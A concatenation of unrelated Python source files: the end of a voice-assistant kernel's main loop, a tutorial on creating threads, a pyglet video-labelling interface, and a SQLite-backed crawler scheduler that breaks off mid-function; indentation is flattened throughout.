if (len(sys.argv) >= 8):
qApiTrn = str(sys.argv[7]).lower()
if (len(sys.argv) >= 9):
qApiOut = str(sys.argv[8]).lower()
if (len(sys.argv) >= 10):
qLangInp = str(sys.argv[9]).lower()
qLangTxt = qLangInp
if (len(sys.argv) >= 11):
qLangTrn = str(sys.argv[10]).lower()
qLangOut = qLangTrn[:2]
if (len(sys.argv) >= 12):
qLangTxt = str(sys.argv[11]).lower()
if (len(sys.argv) >= 13):
qLangOut = str(sys.argv[12]).lower()
qLog.log('info', main_id, 'runMode =' + str(runMode ))
qLog.log('info', main_id, 'micDev =' + str(micDev ))
qLog.log('info', main_id, 'micType =' + str(micType ))
qLog.log('info', main_id, 'micGuide =' + str(micGuide ))
qLog.log('info', main_id, 'micLevel =' + str(micLevel ))
qLog.log('info', main_id, 'qApiInp =' + str(qApiInp ))
qLog.log('info', main_id, 'qApiTrn =' + str(qApiTrn ))
qLog.log('info', main_id, 'qApiOut =' + str(qApiOut ))
qLog.log('info', main_id, 'qLangInp =' + str(qLangInp ))
qLog.log('info', main_id, 'qLangTrn =' + str(qLangTrn ))
qLog.log('info', main_id, 'qLangTxt =' + str(qLangTxt ))
qLog.log('info', main_id, 'qLangOut =' + str(qLangOut ))
# Initial setup
if (qPLATFORM == 'darwin'):
try:
print('macOS: starting Tkinter setup')
subprocess.call(['/usr/bin/osascript', '-e',
'tell app "Finder" to set frontmost of process "python" to true'])
print('macOS: Tkinter setup complete')
except Exception as e:
print('macOS: Tkinter setup failed')
if (True):
qFunc.remove(qCtrl_control_kernel )
qFunc.remove(qCtrl_control_speech )
qFunc.remove(qCtrl_control_vision )
qFunc.remove(qCtrl_control_desktop )
qFunc.remove(qCtrl_control_bgm )
qFunc.remove(qCtrl_control_browser )
qFunc.remove(qCtrl_control_player )
qRiKi.statusReset_speech(False)
qRiKi.statusReset_vision(False)
qRiKi.statusReset_desktop(False)
# GUI
gui_disp = False
gui_time = time.time()
mouse_xy_zero = False
mouse_xy_time = time.time()
# Startup
guide_disp = False
guide_time = time.time()
main_core = None
if (True):
qLog.log('info', main_id, 'start')
# Show guide (startup)
img = qRiKi.getIconImage(filename='_kernel_start_', )
if (not img is None):
qGuide.init(panel='1', title='_kernel_start_', image=img, alpha_channel=0.5, )
qGuide.open()
guide_disp = True
guide_time = time.time()
# Start core thread
main_core = main_kernel(main_id, '0',
runMode=runMode,
micDev=micDev, micType=micType, micGuide=micGuide, micLevel=micLevel,
qApiInp=qApiInp, qApiTrn=qApiTrn, qApiOut=qApiOut,
qLangInp=qLangInp, qLangTrn=qLangTrn, qLangTxt=qLangTxt, qLangOut=qLangOut, )
main_core.begin()
# Main wait loop
while (not main_core is None):
# Check for termination request
control = ''
txts, txt = qFunc.txtsRead(qCtrl_control_self)
if (txts != False):
qLog.log('info', main_id, '' + str(txt))
if (txt == '_end_'):
break
else:
qFunc.remove(qCtrl_control_self)
control = txt
# Launch control
if (control.lower()[:8] == '_speech_') \
or (control.lower()[:8] == '_vision_') \
or (control.lower()[:9] == '_desktop_') \
or (control.lower()[:5] == '_bgm_') \
or (control.lower()[:9] == '_browser_') \
or (control.lower()[:8] == '_player_'):
main_core.put(['control', control])
control = ''
# Reboot
if (control == '_reboot_'):
main_core.abort()
del main_core
qFunc.remove(qCtrl_control_kernel)
main_core = None
main_core = main_kernel(main_id, '0',
runMode=runMode,
micDev=micDev, micType=micType, micGuide=micGuide, micLevel=micLevel,
qApiInp=qApiInp, qApiTrn=qApiTrn, qApiOut=qApiOut,
qLangInp=qLangInp, qLangTrn=qLangTrn, qLangTxt=qLangTxt, qLangOut=qLangOut, )
main_core.begin()
# Show GUI
if (control == '_gui_'):
GUI.init(alpha_channel=0.7, )
GUI.open()
gui_disp = True
gui_time = time.time()
if (gui_disp == True):
GUI.statusSet('_STS_SPEECH_', qFunc.statusCheck(qBusy_s_inp, ), )
GUI.statusSet('_STS_RECORD_', qFunc.statusCheck(qBusy_d_rec, ), )
GUI.statusSet('_STS_TELEWORK_', qFunc.statusCheck(qBusy_d_telework, ), )
else:
x, y = pyautogui.position()
if (x<100) and (y<100):
if (mouse_xy_zero == True):
if ((time.time() - mouse_xy_time) > 3):
GUI.init(alpha_channel=0.7, )
GUI.open()
gui_disp = True
gui_time = time.time()
try:
#pyautogui.FAILSAFE = False
pyautogui.moveTo(0,101)
#pyautogui.FAILSAFE = True
except:
pass
else:
mouse_xy_zero = True
mouse_xy_time = time.time()
else:
mouse_xy_zero = False
# Thread responses
while (main_core.proc_r.qsize() != 0) and (control == ''):
res_data = main_core.get()
res_name = res_data[0]
res_value = res_data[1]
if (res_name.lower() == 'control'):
control = res_value
break
# Show guide
if (res_name.lower() == '_guide_'):
if (guide_disp == True):
qGuide.setMessage(txt=res_value, )
guide_time = time.time()
else:
img = qRiKi.getIconImage(filename='_kernel_guide_', )
if (not img is None):
qGuide.init(panel='1', title='_kernel_guide_', image=img, alpha_channel=0.5, )
qGuide.setMessage(txt=res_value, )
#qGuide.open()
guide_disp = True
guide_time = time.time()
# GUI display (auto close)
if (gui_disp == True):
event, values = GUI.read()
if (event in (None, '-exit-', '-cancel-')):
#print(event, values)
GUI.close()
gui_disp = False
if (event == '-ok-'):
#print(event, values)
GUI.close()
gui_disp = False
if (event[:5].lower() == 'riki,'):
#print(event, values)
GUI.close()
gui_disp = False
nowTime = datetime.datetime.now()
stamp = nowTime.strftime('%Y%m%d.%H%M%S')
controld_file = qPath_s_ctrl + stamp + '.txt'
qFunc.txtsWrite(controld_file, txts=[event], encoding='utf-8', exclusive=True, mode='w', )
controld_file = qPath_v_ctrl + stamp + '.txt'
qFunc.txtsWrite(controld_file, txts=[event], encoding='utf-8', exclusive=True, mode='w', )
controld_file = qPath_d_ctrl + stamp + '.txt'
qFunc.txtsWrite(controld_file, txts=[event], encoding='utf-8', exclusive=True, mode='w', )
x, y = pyautogui.position()
if (x==0) and (y==0):
gui_time = time.time()
if ((time.time() - gui_time) > 15):
GUI.close()
gui_disp = False
# Guide display (auto close)
if (guide_disp == True):
event, values = qGuide.read()
if (event in (None, '-exit-', '-cancel-')):
qGuide.close()
guide_disp = False
if (guide_disp == True):
if ((time.time() - guide_time) > 3):
qGuide.close()
guide_disp = False
# Idle wait
slow = False
if (qFunc.statusCheck(qBusy_dev_cpu) == True):
slow = True
if (slow == True):
time.sleep(1.00)
else:
time.sleep(0.25)
# Shutdown
if (True):
qLog.log('info', main_id, 'terminate')
# Close GUI
GUI.close()
GUI.terminate()
gui_disp = False
# Show guide (shutdown)
img = qRiKi.getIconImage(filename='_kernel_stop_', )
if (not img is None):
qGuide.init(panel='1', title='_kernel_stop_', image=img, alpha_channel=0.5, )
qGuide.open()
guide_disp = True
guide_time = time.time()
# Stop core thread
if (not main_core is None):
main_core.abort()
del main_core
# Close guide display
qGuide.close()
qGuide.terminate()
guide_disp = False
time.sleep(5.00)
qLog.log('info', main_id, 'bye!')
sys.exit(0)
|
threadtest.py
|
# coding=utf-8
# @Time : 2017-09-29
# @Author : J.sky
# @Mail : bosichong@qq.com
# @Site : www.17python.com
# @Title : Python multithreading (1): several ways to create threads
# @Url : http://www.17python.com/blog/32
# @Details : Python multithreading (1): several ways to create threads
# @Other : OS X 10.11.6
# Python 3.6.1
# VSCode 1.15.1
###################################
# Python multithreading (1): several ways to create threads
###################################
'''
## Python multithreading
In day-to-day programming, when we face a large number of identical, repetitive computations, we consider using multiple threads. Threads let the functions in a program run concurrently, so the CPU can produce results faster and we save time.
There are many ways to create threads in `Python`, for example via `_thread`, `threading.Thread`, or the methods provided by a thread pool. This article focuses on how to create threads.
## Single-threaded operation
We define a few operations and first run them sequentially in a single thread.
'''
# import time
# def loop():
# print("循环loop1打印时间======",time.ctime())
# time.sleep(3)
# loop()
# loop()
# print("loop1打印结束时间======",time.ctime())
'''
loop1 print time ====== Mon Oct 2 07:59:17 2017
loop1 print time ====== Mon Oct 2 07:59:20 2017
loop1 finished at ====== Mon Oct 2 07:59:23 2017
Running the program sequentially takes 6 seconds in total. If we could run these print calls concurrently, we might save some time.
## thread
`_thread` offers some functions for creating and working with threads, but the official documentation and most references note that `_thread` is a rather low-level module whose direct use is discouraged, so we only touch on it briefly.
'''
# import _thread
# from utils import tn  # import the execution-time measuring decorator from the utils module
# def loop():
# print("循环loop1打印时间======",time.ctime())
# time.sleep(3)
# @tn
# def main():
# _thread.start_new_thread(loop, ())
# _thread.start_new_thread(loop, ())
# time.sleep(3)
# print("如果上边没有sleep(),程序会没有运行完打印直接退出")
# if __name__ == '__main__':
# main()
'''
loop1 print time ====== Mon Oct 2 14:24:49 2017
loop1 print time ====== Mon Oct 2 14:24:49 2017
Without the sleep() above, the program would exit before it finishes printing
Program run time: 3.01ms
This run saved us 3 precious seconds! But it also exposed some drawbacks of the `_thread` module: the main thread does not wait for the other threads when it finishes, which can make the program exit before anything is printed, and that is not what we want.
Because of these shortcomings, `_thread` is generally not recommended; we will move on to the higher-level `threading` module and other thread-related modules.
## The threading module and the Thread class
Create a `Thread` instance; its `target` parameter accepts a function.
Let's try it; the code is as follows:
'''
# import time
# import threading
# from utils import tn  # import the execution-time measuring decorator from the utils module
# def loop1(tname):
# print(tname+"循环loop1打印时间======" + time.ctime())
# time.sleep(2)
# @tn
# def main():
#     print('Program starting; please wait a few seconds.')
#     threads = []  # define a list to hold the threads
# for i in range(5):
# t = threading.Thread(target=loop1, args=("thread"+str(i),))
# threads.append(t)
# for i in range(5):
# threads[i].start()
# for i in range(5):
# threads[i].join()
# if __name__ == '__main__':
# main()
# Create thread objects by deriving a subclass of the Thread class.
# import time
# import threading
# from utils import tn  # import the execution-time measuring decorator from the utils module
# class MyThread(threading.Thread):
# def __init__(self, func, name=''):
#         threading.Thread.__init__(self)  # the parent class constructor must be called here
# self.func = func
# self.name = name
#     # this method must be implemented
# def run(self):
# self.func(self.name)
# def loop1(tname):
# print(tname+"循环loop1打印时间======" + time.ctime())
# time.sleep(2)
# @tn
# def main():
#     print('Program starting; please wait a few seconds.')
#     threads = []  # define a list to hold the threads
# for i in range(5):
# t = MyThread(loop1, "thread"+str(i))
# threads.append(t)
# for i in range(5):
# threads[i].start()
# for i in range(5):
# threads[i].join()
# if __name__ == '__main__':
# main()
'''
Note: the `run()` method must be implemented, and `threading.Thread.__init__(self)` must be called so the parent class constructor runs.
Comparing the two approaches, subclassing `Thread` to create thread instances is a bit more intuitive and flexible. As the examples above show, running the program with multiple concurrent threads saves a lot of time compared with single-threaded execution.
There are other ways to create thread instances; for example, the `target` parameter of the `Thread` constructor can also take a callable object, but in my opinion it is less intuitive than subclassing `Thread`, so no example is given here.
In addition, a thread pool can be used to create a group of threads for executing tasks.
## threadpool: a Python thread pool
Download and install the module under `Python3`:
pip3 install threadpool
Let's test the same printing with a thread pool; the code is as follows:
'''
import time
import threadpool
from utils import tn  # import the execution-time measuring decorator from the utils module
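# Note: `tn` is assumed to be a small timing decorator provided by the local
# utils module (not shown in this file). A minimal sketch under that assumption:
#
#   def tn(func):
#       def wrapper(*args, **kwargs):
#           start = time.time()
#           result = func(*args, **kwargs)
#           print('Program run time: {:.2f}ms'.format((time.time() - start) * 1000))
#           return result
#       return wrapper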
def loop1(tname):
print(tname+"循环loop1打印时间======" + time.ctime())
time.sleep(2)
@tn
def main():
l = ['11111','22222','33333','44444','55555']
    pool = threadpool.ThreadPool(5)  # create a thread pool with 5 worker threads
    requests = threadpool.makeRequests(loop1, l)  # build work requests from the function and its argument list
    [pool.putRequest(req) for req in requests]  # submit each request to the pool, whose worker threads pick up the tasks
    pool.wait()  # block until all requests in the pool have been processed
if __name__ == '__main__':
main()
'''
There are surely many more ways to create threads in `Python` that are not covered here. In my view, subclassing `Thread` is the classic, workable approach with the most readable code; creating a `Thread` object and passing arguments to it is also about as simple as it gets.
That is all for now on creating threads in `Python`; thread locks will be studied a bit later. These days are the National Day holidays, so have fun, everyone!
'''
|
label.py
|
import numpy as np
import os
from scipy.ndimage import zoom
import time
import pyglet
from pyglet.text import Label
from pyglet.window import key, Window
from threading import Thread  # used by VideoRenderer.threaded_render
class Im(object):
def __init__(self, display=None):
self.window = None
self.isopen = False
self.display = display
self.last_keystroke = ''
self._rec_input = False
self._text_h = 512
self._text_w = 512
self._text_c = 3
self._waiting = False
def wait(self):
self._waiting = True
self.txtshow('Waiting for data; no input required at this time')
def cont(self):
self._waiting = False
self.txtshow('Renderer ready!')
def wait_for_input(self, timeout=None):
if self.window is None: return
init_t = time.time()
while not self._rec_input and (timeout is None or time.time() - init_t < timeout):
self.window.dispatch_events()
def check_input(self):
if self.window is None: return
self.window.dispatch_events()
def txtshow(self, text):
if self.window is None:
width, height = self._text_w, self._text_h
self.window = pyglet.window.Window(
width=width, height=height, display=self.display)
self.width = width
self.height = height
self.channels = self._text_c
self.isopen = True
@self.window.event
def on_key_press(symbol, modifiers):
self.last_keystroke = key.symbol_string(symbol).lower().strip('_')
print('\n\nReceived keyboard input', self.last_keystroke, '\n\n')
self._rec_input = True
label = Label(text, font_name='Times New Roman', font_size=12,
anchor_x='center', anchor_y='center',
x=self.window.width//2, y=self.window.height//2)
self.window.clear()
self.window.switch_to()
self.window.dispatch_events()
label.draw()
self.window.flip()
def imshow(self, arr):
if self.window is None:
height, width, channels = arr.shape
self.window = pyglet.window.Window(
width=width, height=height, display=self.display)
self.width = width
self.height = height
self.channels = channels
self.isopen = True
@self.window.event
def on_key_press(symbol, modifiers):
self.last_keystroke = key.symbol_string(symbol).lower().strip('_')
print('\n\nReceived keyboard input', self.last_keystroke, '\n\n')
self._rec_input = True
assert arr.shape == (self.height, self.width, self.channels), \
    "You passed in an image with the wrong shape"
flipped_arr = np.flip(arr, axis=0)
image = pyglet.image.ImageData(self.width, self.height,
'RGB', flipped_arr.tobytes())
self.window.clear()
self.window.switch_to()
self.window.dispatch_events()
image.blit(0, 0)
self.window.flip()
def close(self):
if self.isopen:
self.window.close()
self.isopen = False
def __del__(self):
self.close()
class VideoRenderer:
play_through_mode = 0
restart_on_get_mode = 1
def __init__(self, mode=0, fps=8, zoom=3, playback_speed=1, channels=3):
self.mode = mode
self.channels = channels
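# Zoom only the spatial axes; for multi-channel frames the channel axis gets a
# zoom factor of 1 so the number of channels stays unchanged.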
if self.channels == 1:
self.zoom_factor = zoom
else:
self.zoom_factor = [zoom]*(self.channels-1) + [1]
self.playback_speed = playback_speed
self.stop_render = False
self.current_frames = None
self.v = None
self.fps = fps
self.sleep_time = 1./self.fps
self.cur_t = 0
self._waiting = False
def wait(self):
if not self._waiting:
if self.v is not None: self.v.close()
self.v = Im()
self._waiting = True
self.v.wait()
def cont(self):
if self._waiting:
self._waiting = False
if self.v is not None:
self.v.cont()
time.sleep(0.5)
self.v.close()
def stop(self):
self.stop_render = True
def threaded_render(self, frames):
render_thread = Thread(target=self.render, args=(frames,))
render_thread.start()
def get_time(self):
return self.cur_t
def wait_for_user(self):
if self.v is not None: self.v.close()
v = Im()
v.txtshow('Render ready; please hit any key...')
v.wait_for_input()
v.close()
def interactive_render(self, frames, max_iters=10):
if self.v is not None: self.v.close()
v = Im()
t = 0
cur_iter = 0
self.stop_render = False
keystroke = 'u'
t_limit = 60
init_t = time.time()
while not self.stop_render and \
time.time() - init_t < t_limit:
if t >= len(frames): t = 0
if t == 0: cur_iter += 1
self.cur_t = t
start = time.time()
zoomed_frame = zoom(frames[t], self.zoom_factor, order=1)
v.imshow(zoomed_frame)
end = time.time()
render_time = end - start
t += min(len(frames)-t, self.playback_speed)
v.check_input()
if v._rec_input:
keystroke = v.last_keystroke
break
sleep_time = max(0, self.sleep_time-render_time)
time.sleep(sleep_time)
v.close()
return keystroke, self.cur_t
def render(self, frames, max_iters=20):
if self.v is not None: self.v.close()
v = Im()
t = 0
cur_iter = -1
self.stop_render = False
while not self.stop_render and cur_iter < max_iters:
if t >= len(frames): t = 0
if t == 0: cur_iter += 1
self.cur_t = t
start = time.time()
zoomed_frame = zoom(frames[t], self.zoom_factor, order=1)
v.imshow(zoomed_frame)
end = time.time()
render_time = end - start
t += min(len(frames)-t, self.playback_speed)
sleep_time = max(0, self.sleep_time-render_time)
time.sleep(sleep_time)
v.close()
class LabelInterface(object):
def __init__(self):
self.failures = []
self.successes = []
self.fail_files = []
self.suc_files = []
self.labels = []
self.cur_file = 0
self.label_file = 'human_labels_{}'.format(self.cur_file)
self.n = 0
self.renderer = VideoRenderer()
self.user_response_timeout = 1.
self.video_renderer = VideoRenderer()
self.label_dir = 'labels/'
self.stopped = False
if not os.path.exists(self.label_dir):
os.mkdir(self.label_dir)
while os.path.exists(self.label_dir+self.label_file+'.npy'):
self.cur_file += 1
self.label_file = 'human_labels_{}'.format(self.cur_file)
def run(self, dname):
self._find_files(dname)
while not self.stopped:
val = np.random.uniform() < 0.1
self.search_query(t=6, N=10, val=val)
self.write_labels_to_file()
def _find_files(self, dname):
fnames = os.listdir(dname)
for fname in fnames:
if fname.find('suc') >= 0:
self.suc_files.append(dname+fname)
elif fname.find('fail') >= 0:
self.fail_files.append(dname+fname)
def load_from_directory(self, dname):
fnames = os.listdir(dname)
for fname in fnames:
if fname.find('pkl') < 0: continue
self.load_from_file(fname)
def load_from_file(self, fname):
data = np.load(fname, allow_pickle=True)
for t in range(len(data[0])):
x = data[1][t]
if np.all(np.abs(x[-1]-x[0]) < 0.1): continue
if data[-1][t]:
self.successes.append([val[t] for val in data])
else:
self.failures.append([val[t] for val in data])
self.n += 1
def write_labels_to_file(self):
np.save(self.label_dir+self.label_file, self.labels)
def get_example(self, val=False):
val = val and len(self.suc_files)
buf = self.successes if val else self.failures
file_buf = self.fail_files if not val else self.suc_files
while not len(buf) and len(file_buf):
ind = np.random.randint(len(file_buf))
fname = file_buf.pop(ind)
self.load_from_file(fname)
if not len(buf):
self.stopped = True
return None
ind = np.random.randint(len(buf))
example = buf.pop(ind)
return example
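# NOTE: the linear-scan search_query defined directly below is shadowed by the
# identically named definition further down (which mirrors binary_search_query);
# in Python the later definition wins, so this first version is never called.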
def search_query(self, t=10, N=1, max_iters=20, val=False):
print('\nRunning search query...\n')
example = self.get_example(val)
if example is None:
self.stopped = True
return
assert example[-1] == val
hor = len(example[0])
cur_t = 0
invalid_input = False
ts = []
cur_iter = 0
st, et = 0, t
while st >= 0 and et <= hor:
cur_iter += 1
invalid_input = False
res, label_t = self.query_user(example, (st, et))
print('\n\nInterpreted input as: {}\n\n'.format(res))
if res == 'before':
st -= t // 2
et -= t // 2
elif res == 'after':
st += t // 2
et += t // 2
ts.extend([st, cur_t, et-1])
elif res == 'during':
ts.append(st)
break
elif res == 'stop':
self.stopped = True
break
elif res == 'ignore':
break
else:
invalid_input = True
print('Invalid search query', res)
for i, t in enumerate(ts[-N:]):
self.labels.append((res, example[1][t], example[2], example[3], example[-1], len(ts[-N:])-i-1))
def binary_search_query(self, t=10, N=1, max_iters=20, val=False):
print('\nRunning search query...\n')
example = self.get_example(val)
if example is None:
self.stopped = True
return
assert example[-1] == val
hor = len(example[0])
cur_t = hor // 2
invalid_input = False
visited = set()
ts = []
cur_iter = 0
wind = 1 # Consider nearby timesteps visited
a, b = 0, hor
prev_a, prev_b = -1, -1
st, et = max(0, cur_t - t//2), min(cur_t + t//2, hor)
while cur_iter < max_iters and \
(cur_t not in visited or invalid_input) and \
(a != prev_a or b != prev_b):
cur_iter += 1
invalid_input = False
cur_t = max(0, min(cur_t, hor))
visited.update(list(range(cur_t-wind, cur_t+wind+1)))
res, label_t = self.query_user(example, (st, et))
prev_a, prev_b = a, b
print('\n\nInterpreted input as: {}\n\n'.format(res))
if res == 'before':
b = cur_t
elif res == 'after':
a = cur_t
ts.extend([st, cur_t, et-1])
elif res == 'during':
ts.append(st)
break
elif res == 'stop':
self.stopped = True
break
elif res == 'ignore':
break
else:
invalid_input = True
print('Invalid search query', res)
cur_t = (a + b) // 2
st, et = max(0, cur_t - t//2), min(cur_t + t//2, hor)
for i, t in enumerate(ts[-N:]):
self.labels.append((res, example[1][t], example[2], example[3], example[-1], len(ts[-N:])-i-1))
    def search_query(self, t=10, N=1, max_iters=20, val=False):
        # Alias: the binary-search strategy above is the one actually used by run().
        return self.binary_search_query(t=t, N=N, max_iters=max_iters, val=val)
def query_user(self, example, seg_ts):
choice, ts = self.renderer.interactive_render(example[0][seg_ts[0]:seg_ts[1]])
choice = self.parse_key(choice)
return choice, seg_ts[0] + ts
def parse_key(self, keystroke):
keystroke = keystroke.lstrip().rstrip()
if keystroke.lower() in ['b', '1', 'before', 'left']:
return 'before'
if keystroke.lower() in ['a', '3', 'after', 'right']:
return 'after'
if keystroke.lower() in ['d', '2', 'during', 'space']:
return 'during'
if keystroke.lower() in ['s', '0', 'stop', 'q', 'quit']:
return 'stop'
if keystroke.lower() in ['u', 'i', '', 'unsure', 'ignore']:
return 'ignore'
return 'invalid'
if __name__ == "__main__":
dname = 'rollouts/'
labeller = LabelInterface()
labeller.run(dname)
|
scheduler.py
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @author: XYZ
# @file: scheduler.py
# @time: 2020.11.19 16:46
# @desc:
# @references:
# https://charlesleifer.com/blog/going-fast-with-sqlite-and-python/
import os
import time
import queue
import pickle
import sqlite3
import logging
import threading
from multiprocessing import Queue, Process
import nspider.utilities.constant as const
from nspider.core.log import MultiprocessLog
from nspider.settings import Settings
from nspider.core.request import Request
class Scheduler(Process):
def __init__(self, settings: Settings, shared_memory_handler, use_cache=True):
super().__init__()
self.stop_signal = False
self.pause_signal = False
self.fusing_flag = False
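        # when the in-memory queue grows past BUFFER_REQUEST_THRESHOLD this "fuse" trips and
        # incoming requests are spilled to the SQLite buffer table until the queues drain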
self.use_cache = use_cache
self.settings = settings
self.shared_memory_handler = shared_memory_handler
# inner request queue
self.__inner_request_queue = Queue()
        # fingerprints of requests currently being processed
self.__request_in_process_fingerprint = set()
        # fingerprints of requests that have completed successfully
self.__request_done_fingerprint = set()
        # requests that failed
self.__request_failed = set()
self.db_path = os.path.join(const.CACHE_DIR, self.settings.DB)
self.__init_db()
def __init_db(self):
if not os.path.exists(self.db_path):
with open(self.db_path, "wb") as f:
pass
elif not os.path.isfile(self.db_path):
            raise Exception("Naming conflicts: Can't create db with this name: {}".format(self.db_path))
conn = sqlite3.connect(self.db_path)
c = conn.cursor()
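        # WAL journal mode lets readers proceed concurrently with a single writer,
        # which suits the multiple threads sharing this database (see the reference above)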
c.execute('pragma journal_mode=wal;')
create_request_done_table = "CREATE TABLE if not exists {} ({} TEXT PRIMARY KEY)".format(const.REQUEST_DONE_TABLE, const.COLUMN_NAME_FINGERPRINT)
create_request_buffer_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} BLOB)".format(const.REQUEST_BUFFER_TABLE, const.COLUMN_NAME_PARAMS)
create_request_failed_table = "CREATE TABLE if not exists {} ({} TEXT PRIMARY KEY, {} BLOB)".format(const.REQUEST_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST)
create_request_in_process_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} TEXT, {} BLOB)".format(const.REQUEST_IN_PROCESS_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST)
create_request_parse_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} TEXT, {} BLOB)".format(const.REQUEST_PARSE_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST)
create_request_parse_failed_table = "CREATE TABLE if not exists {} ({} TEXT PRIMARY KEY, {} BLOB)".format(const.REQUEST_PARSE_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST)
tables = [create_request_in_process_table, create_request_buffer_table, create_request_done_table, create_request_failed_table, create_request_parse_table, create_request_parse_failed_table]
for t in tables:
c.execute(t)
conn.close()
def __load_cache(self):
c = self.conn.cursor()
in_process_requests = c.execute("SELECT * FROM {}".format(const.REQUEST_IN_PROCESS_TABLE))
for r in in_process_requests:
new_request = pickle.loads(r[2])
self.__inner_request_queue.put(new_request)
self.__request_in_process_fingerprint.add(r[1])
            self.logger.info("Re-added request that was still in process: {}".format(new_request.url))
requests_parse = c.execute("SELECT * FROM {}".format(const.REQUEST_PARSE_TABLE))
for r in requests_parse:
new_request = pickle.loads(r[2])
self.__add_request(self.c, new_request=new_request)
            # pretend the parse is done and delete this row now; it will be re-added to request_parse later anyway
self.parse_done(self.c, r[1])
            self.logger.info("Re-added request that was still being parsed or had failed to parse: {}".format(new_request.url))
requests_done = c.execute("SELECT * FROM {}".format(const.REQUEST_DONE_TABLE))
for r in requests_done:
self.__request_done_fingerprint.add(r[0])
requests_failed = c.execute("SELECT * FROM {}".format(const.REQUEST_FAILED_TABLE))
for r in requests_failed:
self.__request_failed.add(pickle.loads(r[1]))
def run(self):
MultiprocessLog.worker_configurer(self.shared_memory_handler.log_message_queue)
self.logger = logging.getLogger(self.name)
self.conn = sqlite3.connect(self.db_path, check_same_thread=False, isolation_level=None)
self.c = self.conn.cursor()
if self.use_cache:
self.__load_cache()
self.__init_reply_receiver()
self.__init_request_manager()
self.__init_request_transfer()
self.reply_receiver.join()
self.request_manager.join()
self.request_transfer.join()
def __init_reply_receiver(self):
self.reply_receiver = threading.Thread(target=self.__reply_receiver_process)
self.reply_receiver.setDaemon(True)
self.reply_receiver.start()
def __reply_receiver_process(self):
c = self.conn.cursor()
while not self.stop_signal:
if self.pause_signal:
time.sleep(1)
continue
(reply_type, data) = self.shared_memory_handler.get_request_reply()
if reply_type == const.REPLY_REQUEST_DONE:
self.request_done(c, data)
elif reply_type == const.REPLY_REQUEST_FAILED:
self.request_failed(c, data)
elif reply_type == const.REPLY_REQUEST_PARSE:
self.request_parse(c, data)
elif reply_type == const.REPLY_PARSE_DONE:
self.parse_done(c, data)
elif reply_type == const.REPLY_PARSE_FAILED:
self.parse_failed(c, data)
def __init_request_transfer(self):
self.request_transfer = threading.Thread(target=self.__request_transfer_process)
self.request_transfer.setDaemon(True)
self.request_transfer.start()
def __request_transfer_process(self):
while not self.stop_signal:
if self.pause_signal:
time.sleep(1)
continue
request = self.get_inner_request()
self.shared_memory_handler.add_request(new_request=request)
def __init_request_manager(self):
self.request_manager = threading.Thread(target=self.__request_manager_process)
self.request_manager.setDaemon(True)
self.request_manager.start()
def __request_manager_process(self):
c = self.conn.cursor()
while not self.stop_signal:
if self.pause_signal:
time.sleep(1)
continue
try:
(args, kwargs) = self.shared_memory_handler.get_buffer_request(timeout=1)
except queue.Empty:
if self.shared_memory_handler.is_all_task_queue_empty():
                    res = c.execute("SELECT * FROM {} LIMIT ?".format(const.REQUEST_BUFFER_TABLE), (self.settings.BUFFER_REQUEST_THRESHOLD, ))
                    rows = res.fetchall()
                    if rows:
                        for row in rows:
                            id_ = row[0]
                            (args, kwargs) = pickle.loads(row[1])
                            self.__add_request(c, *args, **kwargs)
                            c.execute("DELETE FROM {} WHERE id=?".format(const.REQUEST_BUFFER_TABLE), (id_, ))
                    else:
                        self.fusing_flag = False
else:
if self.__inner_request_queue.qsize() > self.settings.BUFFER_REQUEST_THRESHOLD:
self.fusing_flag = True
if self.fusing_flag:
self.__add_request_in_buffer(c, (args, kwargs))
else:
res = self.__add_request(c, *args, **kwargs)
if not res:
self.logger.warning("Refuse adding request: {}".format(args[0]))
else:
self.logger.info("Added request: {}".format(args[0]))
self.logger.debug("Added request in buffer queue: {}".format(time.time()))
def __add_request_in_buffer(self, c, params):
        c.execute("INSERT INTO {}({}) VALUES (?)".format(const.REQUEST_BUFFER_TABLE, const.COLUMN_NAME_PARAMS), (pickle.dumps(params),))
@property
def request_done_fingerprint(self):
return self.__request_done_fingerprint
def __add_request(self, c, *args, new_request=None, in_process_filter=True, dupe_filter=True, block=True, timeout=None, **kwargs):
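        """Build (or reuse) a Request and queue it, skipping requests whose fingerprint is
        already in process or already done; returns False when the request is refused."""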
if not new_request:
new_request = Request(*args, **kwargs)
fingerprint = new_request.fingerprint
if in_process_filter:
if fingerprint in self.__request_in_process_fingerprint:
return False
if dupe_filter:
if fingerprint in self.__request_done_fingerprint:
return False
self.__request_in_process_fingerprint.add(fingerprint)
c.execute("INSERT OR IGNORE INTO {}({}, {}) VALUES (?, ?)".format(const.REQUEST_IN_PROCESS_TABLE,
const.COLUMN_NAME_FINGERPRINT,
const.COLUMN_NAME_REQUEST),
(fingerprint, pickle.dumps(new_request)))
self.__inner_request_queue.put(new_request, block, timeout)
return True
def get_inner_request(self, block=True, timeout=None):
return self.__inner_request_queue.get(block, timeout)
def request_done(self, c, fingerprint):
self.__request_done_fingerprint.add(fingerprint)
self.__request_in_process_fingerprint.discard(fingerprint)
c.execute("INSERT OR IGNORE INTO {}({}) VALUES (?)".format(const.REQUEST_DONE_TABLE, const.COLUMN_NAME_FINGERPRINT), (fingerprint, ))
c.execute("DELETE FROM {} WHERE id IN (SELECT id FROM {} WHERE {}=? ORDER BY id LIMIT 1)".format(const.REQUEST_IN_PROCESS_TABLE, const.REQUEST_IN_PROCESS_TABLE, const.COLUMN_NAME_FINGERPRINT), (fingerprint, ))
def request_failed(self, c, request: Request):
self.__request_failed.add(request)
c.execute("INSERT OR IGNORE INTO {}({}, {}) VALUES (?, ?)".format(const.REQUEST_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_REQUEST), (request.fingerprint, pickle.dumps(request), ))
def request_parse(self, c, request: Request):
c.execute("INSERT OR IGNORE INTO {}({}, {}) VALUES (?, ?)".format(const.REQUEST_PARSE_TABLE,
const.COLUMN_NAME_FINGERPRINT,
const.COLUMN_NAME_REQUEST),
(request.fingerprint, pickle.dumps(request),))
def parse_done(self, c, fingerprint):
